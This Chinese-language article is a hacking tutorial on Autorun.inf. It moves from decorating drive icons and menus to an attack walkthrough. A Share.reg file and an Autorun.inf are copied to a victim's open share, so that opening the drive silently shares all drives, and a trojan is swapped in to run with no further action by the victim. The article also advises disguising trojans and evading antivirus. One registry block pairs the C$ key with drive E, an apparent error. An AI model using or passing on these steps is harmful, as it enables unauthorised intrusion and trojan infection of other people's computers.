解析Autorun.inf文件的攻击

　　最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法，由于AutoRun.inf文件在黑客技术中的应用还是很少见的，相应的资料也不多，有很多人对此觉得很神秘，本文试图为您解开这个迷，使您能完全的了解这个并不复杂却极其有趣的技术。
　　
　　一、理论基础
　　
　　经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢？光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
　　
　　AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择“重命名”，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容：
　　
　　[AutoRun]　　　　//表示AutoRun部分开始，必须输入
　　Icon=C:\C.ico　　//给C盘一个个性化的盘符图标C.ico
　　Open=C:\1.exe　　//指定要运行程序的路径和名称，在此为C盘下的1.exe
　　
　　保存该文件，按F5刷新桌面，再看“我的电脑”中的该盘符（在此为C盘），你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件！
　　
　　解释一下：“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”为图标文件路径和文件名，你在输入时可以将它改为你的图片文件所在路径和文件名。另外，“.ico”为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。
　　
　　“Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把“OPEN”行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。
　　
　　请大家注意：保存的文件名必须是“AutoRun.inf”，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用Flash做一个自动播放文件，再编上“Autorun”文件，那你就有最酷、最个性的硬盘了。
　　
　　到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的效果，那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句：
　　
　　shell\标志＝显示的鼠标右键菜单中内容
　　
　　shell\标志\command＝要执行的文件或命令行
　　
　　所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可，示例如下：
　　
　　shell\1=天若有情天亦老
　　shell\1\command\=notepad ok.txt
　　
　　保存完毕，按F5键刷新，然后用鼠标右键单击硬盘图标，在弹出菜单中会发现“天若有情天亦老”（图1），点击它，会自动打开硬盘中的“ok.txt”文件。注意：上面示例假设“ok.txt”文件在硬盘根目录下，notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序，则在“command\”后直接添加该执行程序文件名即可。
　　
　

　　
　　二、实例
　　
　　下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容：
　　
　　REGEDIT4
　　'此处一定要空一行
　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
　　"Path"="C:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:
　　
　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
　　"Path"="D:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:
　　
　　[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]
　　"Path"="E:\\"
　　"Remark"=""
　　"Type"=dword:00000000
　　"Flags"=dword:00000302
　　"Parmlenc"=hex:
　　"Parm2enc"=hex:
　　
　　以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。
　　
　　然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：
　　
　　[AutoRun]
　　Open=regedit/s Share.reg　 //加/s参数是为了导入时不会显示任何信息
　　
　　保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。
　　
　　如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行！这样做的好处显而易见，那就是大大的增加了木马运行的主动性！须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。
　　
　　要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被杀毒软件识别（具体的方法可以看本刊以前的文章），当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了！